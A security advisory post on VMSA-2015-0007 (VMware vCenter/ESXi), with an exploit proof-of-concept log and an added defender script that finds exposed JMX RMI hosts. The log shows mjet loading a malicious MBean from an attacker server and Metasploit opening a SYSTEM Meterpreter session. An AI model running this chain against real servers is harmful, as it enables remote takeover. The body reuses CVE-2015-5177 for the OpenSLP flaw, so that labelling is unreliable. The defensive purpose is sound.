03 Oct

Critical vulnerability in VMware vCenter Server and ESXi


Advisory ID: VMSA-2015-0007
CVE Numbers: CVE-2015-5177 CVE-2015-2342 CVE-2015-1047

CVE-2015-5177 – critical
Flaw in the JMX RMI service of vCenter Server – remote code execution.
A Metasploit module is already available for this.

Proof of concept:
root@Whack:/opt/mjet# nmap -sS 1.1.1.2 -p 9875 --script=/usr/share/nmap/scripts/rmi-dumpregistry.nse
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-15 16:56 BST
Nmap scan report for 1.1.1.2
Host is up (0.00036s latency).
PORT STATE SERVICE
9875/tcp open java-rmi
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @1.1.1.2:50966
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
MAC Address: 00:0C:29:D1:00:30 (VMware)
root@Whack:/opt/mjet# java -jar mjet.jar -t 1.1.1.2 -p 9875 -u http://1.1.1.1:8080/TArDcls4aeQZVWl
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
--------------------------------------------------- 
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://1.1.1.2:9875/jmxrmi ...
[+] Connected: rmi://1.1.1.2 16
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://1.1.1.1:8080/TArDcls4aeQZVWl
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: drmwfzvo:name=NApCjRCB,id=gsKsVVHK
[+] Invoking: metasploit.Metasploit.run()
[+] Done
Metasploit Shell
-------------------------
2015-02-24 10:11:44 +0000 S:0 J:3 msf exploit(java_mlet_server) >
[*] Using URL: http://1.1.1.1:8080/TArDcls4aeQZVWl
[*] Server started.
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl/
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] Sending stage (30355 bytes) to 1.1.1.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.2:50456) at 2015-02-24 10:12:32 +0000
 
2015-02-24 10:14:10 +0000 S:1 J:3 msf exploit(java_mlet_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: SYSTEM
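As an added, defender-side check that is not part of the original post: a small Python script that parses saved output of the nmap rmi-dumpregistry script shown above and lists every host whose RMI registry binds the jmxrmi name, so exposed vCenter instances can be prioritised for the VMware update. The host addresses and the second registry name in the sample are constructed.

```python
# Added check: parse nmap rmi-dumpregistry output and flag hosts whose RMI
# registry binds 'jmxrmi', the JMX connector the VMSA-2015-0007 PoC talks to.
import re
# Constructed sample in nmap's output format; not real scan data.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
PORT     STATE SERVICE
9875/tcp open  java-rmi
| rmi-dumpregistry:
|   jmxrmi
|     javax.management.remote.rmi.RMIServerImpl_Stub
|_    @10.0.0.5:50966
Nmap scan report for 10.0.0.6
PORT     STATE SERVICE
9875/tcp open  java-rmi
| rmi-dumpregistry:
|   reportservice
|_    com.example.ReportStub
Nmap scan report for 10.0.0.7
PORT     STATE SERVICE
9875/tcp filtered java-rmi
"""
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\S+)")
BOUND_RE = re.compile(r"^\|[_ ]\s{2}(\S+)\s*$")  # registry name: exactly 2-space indent

def find_exposed_jmx(nmap_output):
    """Return {host: {"port": int, "bound_names": [...]}} for hosts binding 'jmxrmi'."""
    results, host, port, bound, in_script = {}, None, None, [], False
    def flush():  # record the host just parsed if its registry exposes jmxrmi
        if host and "jmxrmi" in bound:
            results[host] = {"port": port, "bound_names": list(bound)}
    for line in nmap_output.splitlines():
        m = HOST_RE.match(line)
        if m:
            flush()
            host, port, bound, in_script = m.group(1), None, [], False
            continue
        m = PORT_RE.match(line)
        if m and m.group(2) == "open":
            port = int(m.group(1))
        elif line.startswith("| rmi-dumpregistry:"):
            in_script = True
        elif in_script:
            m = BOUND_RE.match(line)
            if m:  # only top-level registry names, not the stub/class lines beneath them
                bound.append(m.group(1))
    flush()
    return results
```

Feed it `nmap -p 9875 --script rmi-dumpregistry -oN scan.txt <vcenter hosts>` output; any host listed still exposes the JMX RMI connector and needs the patch or network isolation.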

CVE-2015-5177:
Flaw in the OpenSLP function – remote code execution.
Affected versions: 5.0, 5.1 and 5.5.

CVE-2015-1047:
The vpxd service in versions 5.0, 5.1 and 5.5 is vulnerable to DoS attacks.

Corresponding updates are already available from VMware.